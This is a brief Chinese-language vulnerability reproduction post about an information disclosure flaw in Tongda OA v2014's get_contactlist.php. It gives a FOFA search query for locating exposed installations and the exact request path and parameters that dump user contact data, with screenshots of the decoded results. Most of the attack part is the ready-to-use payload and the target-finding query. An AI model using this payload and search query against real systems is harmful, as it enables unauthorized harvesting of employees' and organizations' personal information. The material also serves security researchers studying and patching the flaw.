通达OAget_contactlist.php敏感信息泄露漏洞复现
漏洞描述
通达OA(OfficeAnywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息.
![](https://img-blog.csdnimg.cn/img_convert/ef95e6a484e1841dc9888d5bd5a9dcff.png)
fofa语句
app="TDXK-通达OA"
payload
/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3
![](https://img-blog.csdnimg.cn/img_convert/374d5b691ff41ba384f11e89c8610982.png)
解码
![](https://img-blog.csdnimg.cn/img_convert/9270834cc688c7e5d6de4bab38cf814f.png)